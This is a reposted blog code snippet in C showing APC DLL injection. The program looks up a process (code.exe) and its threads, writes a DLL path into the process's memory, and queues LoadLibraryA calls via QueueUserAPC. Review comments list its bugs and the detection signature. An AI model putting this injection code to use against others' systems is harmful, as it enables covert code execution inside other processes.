

APC注入

#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>

// Look up a process id by executable name using the Toolhelp snapshot API.
// pszProcessName: image file name (e.g. "code.exe"), compared case-insensitively.
// Returns the th32ProcessID of the first matching entry.
// Review notes:
//  - If no process matches, control falls off the end of a non-void function:
//    the returned value is undefined (UB), and the caller treats it as a pid.
//  - hSnap is never checked against INVALID_HANDLE_VALUE and is never
//    passed to CloseHandle, so the snapshot handle leaks on every path.
//  - strcmpi is a non-standard (MSVC) name for _stricmp; not portable C.
DWORD GetProcessIdByName(char *pszProcessName) {
HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
// dwSize must be set before Process32First, hence the brace initializer.
PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};
BOOL bRet = Process32First(hSnap, &ProcesEntry);
while (bRet) {
if (strcmpi(ProcesEntry.szExeFile, pszProcessName) == 0) {
return ProcesEntry.th32ProcessID; // snapshot handle leaks here
}
bRet = Process32Next(hSnap, &ProcesEntry);
}
// No return statement: reaching here is undefined behavior.
}

// Collect the thread ids owned by ProcessId from a system-wide thread snapshot.
// ProcessId:    owner process to filter on (th32OwnerProcessID).
// ppThreadId:   receives a malloc'd array of thread ids; ownership passes to
//               the caller, who is responsible for free().
// LengthThread: receives the number of ids written.
// Review notes:
//  - Declared BOOL but never returns a value: the caller reads an
//    undefined result (UB).
//  - The array is a fixed 1024 entries with no bound check on count; a
//    process with more than 1024 threads overruns the heap buffer.
//  - malloc's result is not checked for NULL before being written to.
//  - hSnap is neither validated nor closed (handle leak).
BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){
HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
// dwSize must be initialised before Thread32First.
THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};
BOOL bRet=Thread32First(hSnap, &ThreadEntry);
DWORD *pThreadId =malloc(sizeof(DWORD)*1024); // fixed capacity, unchecked
int count=0;
while(bRet){
if(ThreadEntry.th32OwnerProcessID==ProcessId){
pThreadId[count]=ThreadEntry.th32ThreadID; // no check that count < 1024
count++;
}
bRet=Thread32Next(hSnap, &ThreadEntry);
}
*ppThreadId=pThreadId;
*LengthThread=count; // int -> DWORD conversion; count is never negative here
// Missing return: the BOOL result is undefined.
}

// Queue a user-mode APC calling LoadLibraryA(pszDllName) on every thread of
// the named process. This is the classic APC injection chain
// (MITRE ATT&CK T1055.004): Toolhelp enumeration -> OpenProcess ->
// VirtualAllocEx -> WriteProcessMemory -> GetProcAddress(LoadLibraryA) ->
// OpenThread -> QueueUserAPC. From a detection standpoint this exact call
// sequence, issued against another process, is what endpoint telemetry
// looks for.
// pszProcessName: target image name, resolved via GetProcessIdByName.
// pszDllName:     full path of the DLL, copied into the target's memory.
// Review notes:
//  - Declared BOOL but never returns a value (UB for the caller).
//  - No return value is checked: a failed lookup, OpenProcess,
//    VirtualAllocEx, WriteProcessMemory, GetProcAddress or OpenThread is
//    silently carried into the next call (e.g. NULL handles, NULL address).
//  - hProcess and each hThread are never closed; pThreadId is never freed.
//  - NOTE(review): an APC is only delivered when its thread enters an
//    alertable wait, which is presumably why the code queues to every
//    thread; any thread that does become alertable will run LoadLibraryA
//    independently, so the DLL's entry point may be reached more than once.
BOOL DllInject(char *pszProcessName,char *pszDllName){
DWORD ProcessId=GetProcessIdByName(pszProcessName); // undefined if no match
DWORD *pThreadId=NULL;
DWORD LengthThread=0;
GetAllThreadId(ProcessId, &pThreadId, &LengthThread); // BOOL result ignored
HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId); // unchecked
// Remote buffer sized for the path plus its terminating NUL.
LPVOID lDllAdr=VirtualAllocEx(hProcess, NULL, strlen(pszDllName)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, lDllAdr, pszDllName, strlen(pszDllName)+1, 0); // unchecked
// Local kernel32 address is used as the remote address; this relies on
// kernel32.dll being mapped at the same base in both processes.
FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
HANDLE hThread;
for(int i=0;i<LengthThread;i++){ // signed/unsigned comparison
hThread=OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]); // unchecked, never closed
QueueUserAPC((PAPCFUNC)pLoadLibraryA, hThread,(ULONG_PTR) lDllAdr); // unchecked
}
// Missing return: the BOOL result is undefined.
}

// Entry point: runs the injection against a hard-coded process name and a
// hard-coded, machine-specific DLL path. The BOOL result of DllInject is
// discarded, so the program always exits 0 regardless of outcome.
int main(){
DllInject("code.exe", "C:\\Users\\beini\\Desktop\\work\\test.dll");
return 0;
}

转载于:https://www.cnblogs.com/far-ring3/p/10928238.html
